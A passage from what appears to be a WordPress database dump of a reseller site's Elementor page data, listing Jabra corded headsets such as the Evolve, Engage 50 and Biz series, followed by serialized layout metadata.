id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"facd86c\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"44d8d74\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"7ce9531\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 30 Stereo \\/ Mono<\\/strong><\\/h2><p>Engineered for flexible connectivity, Evolve 30 is a corded headset for professionals who want simple and fast Plug and Play connection to USB or jack. Features a control unit for easy call management, and is certified for Skype for Business, Cisco, and more. Comes with leather-feel ear cushions and on-the-ear design for all-day use.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8213047\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e63500c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignnone  wp-image-2859 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_20.png\\\" alt=\\\"\\\" width=\\\"200\\\" height=\\\"200\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9153a12\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"c643e7a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f45227\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\" wp-image-2859 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_20.png\\\" alt=\\\"\\\" width=\\\"216\\\" height=\\\"216\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"af9877f\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"e3a1d98\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 20 Stereo \\/ Mono<\\/strong><\\/h2><p>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"801e577\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"9929e95\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"ff8dfcd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Evolve 20 SE<\\/strong><\\/h2><p>Engineered for easy call management, Evolve 20 is an entry-level corded headset for professionals who need great sound for calls and music. A control unit lets you make, take and mute calls, and simple connection makes it easy to get started with your PC. Comes with foam ear cushions and on-the-ear design for all-day use.<\\/p><p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"14\\\"]<\\/strong><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5f15601\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ef4be63\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2867 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Evolve_20_SE_Mono.png\\\" alt=\\\"\\\" width=\\\"204\\\" height=\\\"204\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5a94b95\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"ca1cdef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1a49967\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2870 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Engage_50_3.png\\\" alt=\\\"\\\" width=\\\"219\\\" height=\\\"249\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3dd0dc5\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"33c6633\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Engage 50<\\/strong><\\/h2><p>Is your contact center moving, or considering moving, to softphones? Are you investing in contact center platform \\u2013 whether on-premise or cloud-based? The Jabra Engage 50 is the ideal digital headset to power your customer satisfaction.<\\/p><p>The Jabra Engage 50 features a powerful processing chip in the earcup that delivers advanced functionality including call analytic data.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3befa73\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a85e5e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3d60555\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"48b3240\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"89270cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fd3b8a7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2><strong>Jabra Biz Wired Series<\\/strong><\\/h2><h3>The Jabra Biz has an extremely lightweight and unobtrusive design.<\\/h3>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d449904\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"656485e\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"fbc0249\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Biz 2400 II<\\/strong><\\/h2><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9369d27\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83ee6d0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2873 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Biz_2400_II.png\\\" alt=\\\"\\\" width=\\\"179\\\" height=\\\"179\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0dd5280\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"66a6f72\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0fd4de1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2875 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/jabra_biz_2400_ii_mono_3-in-1.jpg\\\" alt=\\\"\\\" width=\\\"195\\\" height=\\\"195\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e37a9d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f989140\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">Jabra BIZ 2400 II Mono 3-in-1<\\/h2><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"38cc4d8\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"a2798fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cb65d6a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Biz 2400 II DUO<\\/strong><\\/h2><p>A wired professional headset that delivers outstanding sound on both ends of the call. 40% lighter than competing headsets, with super-soft leatherette headband and ear cushions. Built to last with a reinforced cord and unbreakable boom arm.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f72a8b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8703933\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2873 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Biz_2400_II.png\\\" alt=\\\"\\\" width=\\\"188\\\" height=\\\"188\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7f07070\",\"elType\":\"section\",\"settings\":{\"structure\":\"34\"},\"elements\":[{\"id\":\"7909a7f\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5bb3037\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"349a8fd\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/85RJqPjfjng\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"a7a7db0\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"a1a4e97\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1a4c36b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5b09d5f\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6a83600\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"6a528d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"21f7fb1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\" wp-image-2877 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Biz_2300_QD_Duo.png\\\" alt=\\\"\\\" width=\\\"197\\\" height=\\\"197\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0869d9c\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"bec7706\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Biz 2300<\\/strong><\\/h2><p>Built to survive in a high-performing contact centre, meaning fewer headset replacements and less downtime for you and your team and lower total cost of ownership.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8f9ee62\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"27b34fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"4b9598c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Biz 2300 QD<\\/strong><\\/h2><p>Jabra Biz\\u2122 2300 QD Mono is a mono headset with QD (Quick Disconnect) plug that provides instant connectivity to a wide range of desk phone systems.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35b2553\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4047bd4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2876 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Biz_2300_QD.png\\\" alt=\\\"\\\" width=\\\"186\\\" height=\\\"186\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"175e85c\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"519e230\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6bfb90c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\" wp-image-2877 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Biz_2300_QD_Duo.png\\\" alt=\\\"\\\" width=\\\"188\\\" height=\\\"188\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9e4889b\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"b26b188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"solution-group-card__product-name ng-binding\\\" style=\\\"text-align: center;\\\"><strong>Jabra Biz 2300 QD DUO<\\/strong><\\/h2><p>Jabra Biz\\u2122 2300 QD Duo is a duo headset with QD (Quick Disconnect) plug that provides instant connectivity to a wide range of desk phone systems.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ec1e2e4\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"7187165\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"8d1d85b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Biz 1500<\\/strong><\\/h2><p>The Jabra BIZ 1500 is an entry level, low cost professional corded headset built for cost conscious contact centers. With noise cancellation technology, background noise is reduced providing a more professional customer experience on every call.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b92f5f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e6008c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"wp-image-2879 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Biz_1500_DUO_QD.png\\\" alt=\\\"\\\" width=\\\"197\\\" height=\\\"197\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e34ebbb\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\",\"border_radius\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[{\"id\":\"48b05fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cb3f7ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\"><img class=\\\" wp-image-2878 alignnone\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/02\\/Jabra_Biz_1500_DUO_USB.png\\\" alt=\\\"\\\" width=\\\"190\\\" height=\\\"190\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"73b78bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"9a82801\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Jabra Biz 1500 DUO USB<\\/strong><\\/h2><p>Cost Efficient Professional Corded Headset for Softphone.A duo headset that provides USB connectivity to laptops for softphone use. Comes with a control unit for easy control of volume and mute when on a call.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"14\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a829b4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"3b4834e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b38b08e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e8e065f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7b07964\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8551,3651,'_elementor_version','2.5.14'),(8594,16,'_elementor_css','a:5:{s:4:\"time\";i:1571987459;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:1:{i:0;s:0:\"\";}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(8557,3074,'_elementor_controls_usage','a:4:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:5;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:1:{s:5:\"align\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:8;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:4;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:6;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:2;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:1:{s:5:\"image\";i:1;}}}}}'),(8558,3056,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:17;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:17;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:2:{s:5:\"align\";i:6;s:10:\"text_color\";i:6;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:21;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:1:{s:6:\"margin\";i:2;}}s:6:\"layout\";a:1:{s:6:\"layout\";a:2:{s:12:\"_inline_size\";i:17;s:16:\"content_position\";i:4;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:11;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:7;}}s:5:\"style\";a:1:{s:18:\"section_background\";a:2:{s:21:\"background_background\";i:1;s:16:\"background_color\";i:1;}}}}s:5:\"video\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_video\";a:1:{s:11:\"youtube_url\";i:1;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:2:{s:5:\"image\";i:4;s:10:\"image_size\";i:2;}}}}}'),(8559,3031,'_elementor_controls_usage','a:7:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:13;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:13;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:1:{s:5:\"align\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:23;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:3:{s:12:\"_inline_size\";i:20;s:21:\"space_between_widgets\";i:2;s:16:\"content_position\";i:5;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:1:{s:5:\"image\";i:5;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:11;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:8;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:2:{s:5:\"title\";i:2;s:11:\"header_size\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:1:{s:11:\"title_color\";i:2;}}}}s:7:\"divider\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:5:\"video\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_video\";a:1:{s:11:\"youtube_url\";i:1;}}}}}'),(8560,3009,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:8;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:8;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:1:{s:5:\"align\";i:3;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:13;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:2:{s:12:\"_inline_size\";i:10;s:21:\"space_between_widgets\";i:2;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:1:{s:5:\"image\";i:3;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:7;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:4;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:2:{s:5:\"title\";i:2;s:11:\"header_size\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:1:{s:11:\"title_color\";i:2;}}}}s:7:\"divider\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}}'),(8561,3008,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:7;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:7;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:1:{s:5:\"align\";i:3;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:13;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:3:{s:12:\"_inline_size\";i:10;s:21:\"space_between_widgets\";i:2;s:16:\"content_position\";i:2;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:1:{s:5:\"image\";i:3;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:7;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:4;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:2:{s:5:\"title\";i:2;s:11:\"header_size\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:1:{s:11:\"title_color\";i:2;}}}}s:7:\"divider\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}}'),(8562,3007,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:7;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:7;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:1:{s:5:\"align\";i:4;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:14;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:2:{s:12:\"_inline_size\";i:10;s:21:\"space_between_widgets\";i:2;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:2:{s:5:\"image\";i:3;s:10:\"image_size\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:8;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:17:\"section_structure\";a:1:{s:9:\"structure\";i:4;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:2:{s:5:\"title\";i:2;s:11:\"header_size\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:1:{s:11:\"title_color\";i:2;}}}}s:7:\"divider\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}}'),(8563,2999,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:8